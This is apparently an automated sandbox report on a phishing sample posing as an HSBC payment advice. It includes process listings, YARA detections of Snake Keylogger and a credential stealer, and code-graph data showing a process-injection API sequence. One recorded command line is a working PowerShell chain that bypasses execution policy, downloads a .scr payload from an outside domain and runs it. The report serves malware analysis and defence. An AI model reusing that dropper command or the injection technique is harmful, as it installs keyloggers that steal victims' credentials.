                                                    Imagebase:0x7ff663df0000
                                                    File size:170'496 bytes
                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:4
                                                    Start time:15:17:04
                                                    Start date:01/05/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'"
                                                    Imagebase:0x7ff741d30000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:5
                                                    Start time:15:17:04
                                                    Start date:01/05/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff75da10000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:6
                                                    Start time:15:17:08
                                                    Start date:01/05/2024
                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\Public\Payment_Advice.pdf"
                                                    Imagebase:0x7ff702560000
                                                    File size:5'641'176 bytes
                                                    MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:false

                                                    Target ID:7
                                                    Start time:15:17:08
                                                    Start date:01/05/2024
                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                    Imagebase:0x7ff6c3ff0000
                                                    File size:3'581'912 bytes
                                                    MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:false

                                                    Target ID:8
                                                    Start time:15:17:08
                                                    Start date:01/05/2024
                                                    Path:C:\Windows\System32\svchost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                    Imagebase:0x7ff7b4ee0000
                                                    File size:55'320 bytes
                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:9
                                                    Start time:15:17:08
                                                    Start date:01/05/2024
                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1700,i,16204253092957558570,3256571588782708314,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                    Imagebase:0x7ff6c3ff0000
                                                    File size:3'581'912 bytes
                                                    MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:false

                                                    Target ID:23
                                                    Start time:15:17:22
                                                    Start date:01/05/2024
                                                    Path:C:\Windows\Temp\hadvices.scr
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\Temp\hadvices.scr" /S
                                                    Imagebase:0x990000
                                                    File size:1'041'408 bytes
                                                    MD5 hash:012DE24142F859797FBB5A25A7A3290D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000002.1415714567.0000000003E56000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000017.00000002.1415714567.0000000003E56000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000017.00000002.1415714567.0000000003E56000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000017.00000002.1415714567.0000000003E56000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Windows\Temp\hadvices.scr, Author: Joe Security
                                                    Antivirus matches:
                                                    • Detection: 100%, Joe Sandbox ML
                                                    • Detection: 71%, ReversingLabs
                                                    • Detection: 35%, Virustotal
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:25
                                                    Start time:15:17:23
                                                    Start date:01/05/2024
                                                    Path:C:\Windows\Temp\hadvices.scr
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\Temp\hadvices.scr"
                                                    Imagebase:0xe80000
                                                    File size:1'041'408 bytes
                                                    MD5 hash:012DE24142F859797FBB5A25A7A3290D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.2449808868.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000019.00000002.2449808868.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000019.00000002.2449808868.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000019.00000002.2449808868.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000019.00000002.2455454438.0000000003419000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000019.00000002.2455454438.0000000003131000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:false


                                                      Execution Graph

                                                      Execution Coverage:5.7%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:76%
                                                      Total number of Nodes:25
                                                      Total number of Limit Nodes:1
                                                      execution_graph 11390 145a968 11392 145a982 11390->11392 11391 145a9d2 11392->11391 11394 145aa28 11392->11394 11395 145aa5b 11394->11395 11414 1459b1c 11395->11414 11397 145ac32 11398 1459b28 Wow64GetThreadContext 11397->11398 11399 145ad2c 11397->11399 11398->11399 11400 1459b40 ReadProcessMemory 11399->11400 11401 145ae0c 11400->11401 11409 145a758 VirtualAllocEx 11401->11409 11402 145af29 11408 145a600 WriteProcessMemory 11402->11408 11403 145b208 11412 145a600 WriteProcessMemory 11403->11412 11404 145b00d 11404->11403 11410 145a600 WriteProcessMemory 11404->11410 11405 145b246 11406 145b32e 11405->11406 11411 145a4d8 Wow64SetThreadContext 11405->11411 11413 145a878 ResumeThread 11406->11413 11407 145b3eb 11407->11392 11408->11404 11409->11402 11410->11404 11411->11406 11412->11405 11413->11407 11415 145b558 CreateProcessW 11414->11415 11417 145b73e 11415->11417

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 1459150-145915d 1 1459166-1459176 0->1 2 145915f-1459161 0->2 4 145917d-145918d 1->4 5 1459178 1->5 3 1459405-145940c 2->3 7 1459193-14591a1 4->7 8 14593ec-14593fa 4->8 5->3 11 14591a7 7->11 12 145940d-1459486 7->12 8->12 13 14593fc-1459400 call 14588d8 8->13 11->12 14 14591c5-14591e6 11->14 15 1459284-14592a5 11->15 16 1459304-1459341 11->16 17 1459346-145936c 11->17 18 14593e0-14593ea 11->18 19 14591ae-14591c0 11->19 20 14591eb-145920d 11->20 21 14592aa-14592d2 11->21 22 14592d7-14592ff 11->22 23 1459371-145939d 11->23 24 1459212-1459233 11->24 25 14593bc-14593de 11->25 26 145939f-14593ba call 14503e0 11->26 27 145925e-145927f 11->27 28 1459238-1459259 11->28 13->3 14->3 15->3 16->3 17->3 18->3 19->3 20->3 21->3 22->3 23->3 24->3 25->3 26->3 27->3 28->3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1198258163.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1450000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Xq$$q
                                                      • API String ID: 0-855381642
                                                      • Opcode ID: f4e46067ad0589cbf3d00dbdb4d3451056e5b93ddccf0e97770307a89f8b70c8
                                                      • Instruction ID: 33947bda3caf0f31b3e8ebef7b8c28322afb61e4989329103b9e6110ccb41066
                                                      • Opcode Fuzzy Hash: f4e46067ad0589cbf3d00dbdb4d3451056e5b93ddccf0e97770307a89f8b70c8
                                                      • Instruction Fuzzy Hash: 54816234F04219DBDB58EF79945467E7BB7BBC9300B05852EE406EB296DE389C028791
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 111 145aa28-145aa59 112 145aa60-145abe6 111->112 113 145aa5b 111->113 120 145ac0d-145ac52 call 1459b1c 112->120 121 145abe8-145ac0c 112->121 113->112 125 145ac54-145ac70 120->125 126 145ac7b-145ace5 120->126 121->120 125->126 132 145ace7 126->132 133 145acec-145ad18 126->133 132->133 135 145ad79-145adab call 1459b34 133->135 136 145ad1a-145ad27 call 1459b28 133->136 141 145add4 135->141 142 145adad-145adc9 135->142 140 145ad2c-145ad4c 136->140 143 145ad75-145ad77 140->143 144 145ad4e-145ad6a 140->144 145 145add5-145addf 141->145 142->141 143->145 144->143 146 145ade6-145ae2c call 1459b40 145->146 147 145ade1 145->147 154 145ae55-145ae6e 146->154 155 145ae2e-145ae4a 146->155 147->146 156 145aec6-145af3e call 145a758 154->156 157 145ae70-145ae9c call 1459b4c 154->157 155->154 169 145af40-145af51 156->169 170 145af53-145af55 156->170 163 145aec5 157->163 164 145ae9e-145aeba 157->164 163->156 164->163 171 145af5b-145af6f 169->171 170->171 172 145af71-145afab 171->172 173 145afac-145afc3 171->173 172->173 174 145afc5-145afe1 173->174 175 145afec-145b02d call 145a600 173->175 174->175 179 145b056-145b08b 175->179 180 145b02f-145b04b 175->180 184 145b1e3-145b202 179->184 180->179 186 145b090-145b114 184->186 187 145b208-145b266 call 145a600 184->187 197 145b1d8-145b1dd 186->197 198 145b11a-145b18c call 145a600 186->198 192 145b28f-145b2c2 187->192 193 145b268-145b284 187->193 199 145b2c4-145b2cb 192->199 200 145b2cc-145b2df 192->200 193->192 197->184 209 145b18e-145b1ae 198->209 199->200 202 145b2e6-145b311 200->202 203 145b2e1 200->203 207 145b313-145b32c call 145a4d8 202->207 208 145b37b-145b3ad call 1459b58 202->208 203->202 211 145b32e-145b34e 207->211 217 145b3d6 208->217 218 145b3af-145b3cb 208->218 212 145b1d7 209->212 213 145b1b0-145b1cc 209->213 215 145b377-145b379 211->215 216 145b350-145b36c 211->216 212->197 213->212 220 145b3d7-145b3e9 call 145a878 215->220 216->215 217->220 218->217 224 145b3eb-145b40b 220->224 227 145b434-145b53d 224->227 228 145b40d-145b429 224->228 228->227
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1198258163.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1450000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (
                                                      • API String ID: 0-3887548279
                                                      • Opcode ID: 2a9926d68b860c10a0a6149825202fd846c88da0b6141fbbc6701887cd3c9b65
                                                      • Instruction ID: e0189099e6763574ef5f0edc54e0b57b1dfe076b64099cc4870334327a03970a
                                                      • Opcode Fuzzy Hash: 2a9926d68b860c10a0a6149825202fd846c88da0b6141fbbc6701887cd3c9b65
                                                      • Instruction Fuzzy Hash: C452D271D012288FEB68DF69C944BDDBBB2BF89300F5481EAD509A72A1DB345E85CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 239 1459b1c-145b5e3 241 145b5e5-145b5f7 239->241 242 145b5fa-145b608 239->242 241->242 243 145b61f-145b65b 242->243 244 145b60a-145b61c 242->244 245 145b65d-145b66c 243->245 246 145b66f-145b73c CreateProcessW 243->246 244->243 245->246 250 145b745-145b804 246->250 251 145b73e-145b744 246->251 261 145b806-145b82f 250->261 262 145b83a-145b845 250->262 251->250 261->262
                                                      APIs
                                                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0145B729
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1198258163.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1450000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 028128b288c2dab07ae1e5d12ff84cccab7eb6ad097bf26c5c4c0d3b18fe9969
                                                      • Instruction ID: 7841fb73d929a0e17d93825606279a726b4e0540a97aa33ab80ca83d6d91ff59
                                                      • Opcode Fuzzy Hash: 028128b288c2dab07ae1e5d12ff84cccab7eb6ad097bf26c5c4c0d3b18fe9969
                                                      • Instruction Fuzzy Hash: D781D274C0026DCFDB65DFA9C884BEDBBF5AB09300F1491AAE509B7260DB309A85CF54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 266 145a600-145a66b 268 145a682-145a6e3 WriteProcessMemory 266->268 269 145a66d-145a67f 266->269 271 145a6e5-145a6eb 268->271 272 145a6ec-145a73e 268->272 269->268 271->272
                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0145A6D3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1198258163.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1450000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: 032dc31ec779d5f4a7611c50b4debfa84cf15d94b962174fee125d50f496a3fb
                                                      • Instruction ID: 8119bb5b9032fc3e426b1efd94fb5fe2959df80f494b47f2bed952b2c94b78fc
                                                      • Opcode Fuzzy Hash: 032dc31ec779d5f4a7611c50b4debfa84cf15d94b962174fee125d50f496a3fb
                                                      • Instruction Fuzzy Hash: 8741AAB4D012589FDF10CFA9D984ADEFBF1BB49310F24902AE819B7250D735AA45CF64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 277 1459b40-145ba45 ReadProcessMemory 279 145ba47-145ba4d 277->279 280 145ba4e-145ba8c 277->280 279->280
                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0145BA35
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1198258163.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1450000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: 43afc56c0cde75e9d54b4ffb680556ac957c7a547ca927f1fcc216921a031e1e
                                                      • Instruction ID: 95b6e6f19ff5ae729dbd07132e8bd029a1aa763b47c8325089e4c275f0eead4f
                                                      • Opcode Fuzzy Hash: 43afc56c0cde75e9d54b4ffb680556ac957c7a547ca927f1fcc216921a031e1e
                                                      • Instruction Fuzzy Hash: 4C4155B9D042589FCF10CFAAD984AEEFBB5FB19310F10A02AE914B7211D375A945CF64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 283 145a758-145a812 VirtualAllocEx 286 145a814-145a81a 283->286 287 145a81b-145a865 283->287 286->287
                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0145A802
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1198258163.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1450000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: c0cbbb66325871432ec4d524300d8a5deb512a72bc55424b9a10958cba1e56ce
                                                      • Instruction ID: cf35f8b1aca33b2ded2c44190530107c406adfbf26bfc99afb6ec83326e072df
                                                      • Opcode Fuzzy Hash: c0cbbb66325871432ec4d524300d8a5deb512a72bc55424b9a10958cba1e56ce
                                                      • Instruction Fuzzy Hash: D73197B8D002589FCF14CFA9D984ADEFBB1BB49310F20942AE915B7310D735A906CF68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 292 145a4d8-145a538 294 145a54f-145a597 Wow64SetThreadContext 292->294 295 145a53a-145a54c 292->295 297 145a5a0-145a5ec 294->297 298 145a599-145a59f 294->298 295->294 298->297
                                                      APIs
                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 0145A587
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1198258163.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1450000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: ContextThreadWow64
                                                      • String ID:
                                                      • API String ID: 983334009-0
                                                      • Opcode ID: d28296fe40fe28928a68b98342da80f7fd841f8f38707ce2ef0709ab02a54f1d
                                                      • Instruction ID: 6099de91095a0f72a8754504d234765629468ce3cbc5d08377bb529f1d907577
                                                      • Opcode Fuzzy Hash: d28296fe40fe28928a68b98342da80f7fd841f8f38707ce2ef0709ab02a54f1d
                                                      • Instruction Fuzzy Hash: 8631BBB4D012589FDB14DFAAD884AEEFBF1BB49314F24802AE815B7250D738AA45CF54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 303 1459b28-145b8d4 305 145b8d6-145b8e8 303->305 306 145b8eb-145b932 Wow64GetThreadContext 303->306 305->306 307 145b934-145b93a 306->307 308 145b93b-145b973 306->308 307->308
                                                      APIs
                                                      • Wow64GetThreadContext.KERNEL32(?,?), ref: 0145B922
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1198258163.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1450000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: ContextThreadWow64
                                                      • String ID:
                                                      • API String ID: 983334009-0
                                                      • Opcode ID: db11963364c8a88a4ff73d0cc4453bb38a300887ecdb8785793a4883e9dd8cbf
                                                      • Instruction ID: fab35b85961a111f0265d988b9849ac5b9456c636c4e1d36898082402b211618
                                                      • Opcode Fuzzy Hash: db11963364c8a88a4ff73d0cc4453bb38a300887ecdb8785793a4883e9dd8cbf
                                                      • Instruction Fuzzy Hash: 6331ABB4D012589FCB10DFAAD884AEEFBF2EB08310F14902AE814B7351D378A945CF54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 311 145a878-145a906 ResumeThread 314 145a90f-145a951 311->314 315 145a908-145a90e 311->315 315->314
                                                      APIs
                                                      • ResumeThread.KERNELBASE(?), ref: 0145A8F6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1198258163.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1450000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: dde35eaccbd08cb852fdf7f7bd395dc94dd028b336fdc36d8bc8ea937eb2996d
                                                      • Instruction ID: 9ee35f9fcd8afab3d89ce118360c2296cdd0b243961f38bbd350ff3bca80cab1
                                                      • Opcode Fuzzy Hash: dde35eaccbd08cb852fdf7f7bd395dc94dd028b336fdc36d8bc8ea937eb2996d
                                                      • Instruction Fuzzy Hash: 1431CAB4D012189FCB14CFAAD880ADEFBF5BB49310F20942AE815B7310C735A902CF94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1197831107.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_13dd000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cde76ef0aeecce88ea62fb6d80d48030ac2772e95625837a09937316c08fd7f2
                                                      • Instruction ID: ae13856c34b49b965f807c537bab218a953fbc875be9e39e2942a0c625b55fad
                                                      • Opcode Fuzzy Hash: cde76ef0aeecce88ea62fb6d80d48030ac2772e95625837a09937316c08fd7f2
                                                      • Instruction Fuzzy Hash: 062125B2504204DFDB15DF94E9C4B26BF69FB84328F6085ADE9090B686C336D456CBE2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1197831107.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_13dd000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5a5880bb22ed2f6cc543f4025840eef8005e0200a1a6acfe1e1d99a05e961aa0
• Instruction ID: 4362a8c0362a851b0ff6441edb218c4fd9e63463d423e2eac68a08b4b3961de2
• Opcode Fuzzy Hash: 5a5880bb22ed2f6cc543f4025840eef8005e0200a1a6acfe1e1d99a05e961aa0
• Instruction Fuzzy Hash: 752128B2504204DFDB15DF94E9C0B26BF66FB94328F60C569D9050F296C336D456CBA1
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1197831107.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_13dd000_Payment_Advice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
• Instruction ID: 8279b544acff391d611ad5a5326fb3ebd598922abd4fe6c64ec90ff4e5fd950f
• Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
• Instruction Fuzzy Hash: 2211B176504240DFCB16CF54D5C4B16BF72FB84328F2486A9D9090B697C336D456CBE1
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1197831107.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_13dd000_Payment_Advice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
• Instruction ID: ebbe97c87991e55b50d20473ccf74c688199f4376f99c1fffcb12615e7a4b1e8
• Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
• Instruction Fuzzy Hash: 0411E6B6504244DFCB16CF54E5C4B16BF72FB84328F24C6A9D8490B297C336D45ACBA1
Uniqueness

Uniqueness Score: -1.00%
Execution Graph

Execution Coverage:10.7%
Dynamic/Decrypted Code Coverage:49.6%
Signature Coverage:1.3%
Total number of Nodes:2000
Total number of Limit Nodes:24

Roughly half of the executed code ran from dynamically allocated or decrypted memory rather than from the on-disk image (Dynamic/Decrypted Code Coverage 49.6%), which matches the unpacking and injection signatures in the overview; the memory-dump snapshots above (Offset 013DD000, based on PE: false) come from such a region.

[Execution graph rendered as an interactive figure. Its serialized node/edge data (node id, code address, API names called at that node, and src->dst edges) spilled into the text here and is cut off at the end of the page. Call sites recoverable from that data, with the APIs the graph attributes to them:]
• 401005: memset, GetModuleHandleW, HeapCreate; then 40da70: HeapCreate, TlsAlloc; 409780: HeapCreate; 408a2e: memset, 753CE3E0, CoInitialize; 4053b5: RtlInitializeCriticalSection; 401095: GetStdHandle
• 41abd8: VirtualProtect, VirtualProtect
• 4096a1, 4096ab, 4096ba: SetUnhandledExceptionFilter
• 401996: LoadLibraryExW; 4019a3: EnumResourceTypesW, FreeLibrary
• 4092ea: GetModuleFileNameW, wcscmp; 40930d: memmove; 40938b: GetCommandLineW
• 40d683: LoadLibraryW; 40d6a0: GetProcAddress; 40d6c0: FreeLibrary; 40d6cb: InterlockedCompareExchange; 40d6e0: Sleep; 40d6ef: InterlockedExchange
• 4031ca: FindResourceW
• 401fb0: GetTempFileNameW; 402058: GetTempFileNameW, PathAddBackslashW; 4020ad: PathRenameExtensionW
• 403484: GetWindowsDirectoryW, PathAddBackslashW; 4035ad, 4035ea: GetSystemDirectoryW, PathAddBackslashW; 4034c2, 402e28: PathAddBackslashW; 403fc5, 402e8b: PathRemoveBackslashW
• 405594: GetVersionExW; 403ec9: GetModuleHandleW; 405e80: CharUpperW; 411b2c, 411b72: WideCharToMultiByte; 411b60, 411b94: malloc; 411b10: ??3@YAXPAX
• 40548c: CreateThread
• 40ac80: SetFilePointer; 40acd1: memcpy; 40ad35, 40a694: WriteFile
• Heap/TLS helpers reached from almost every node: 40dac0 (GetLastError, TlsGetValue, SetLastError), 40db00 (TlsGetValue, RtlAllocateHeap, RtlReAllocateHeap), 40dc60 (wcslen, TlsGetValue, RtlReAllocateHeap), 40db90 (HeapFree), 40cfb8 (TlsAlloc, RtlAllocateHeap, TlsSetValue), 40cfe0 (TlsGetValue, RtlReAllocateHeap, TlsSetValue), 411a12 (TlsAlloc, RtlInitializeCriticalSection), and the critical-section wrappers around 40d459-40d60e (RtlEnterCriticalSection, RtlLeaveCriticalSection, RtlDeleteCriticalSection, RtlInitializeCriticalSection, HeapFree)
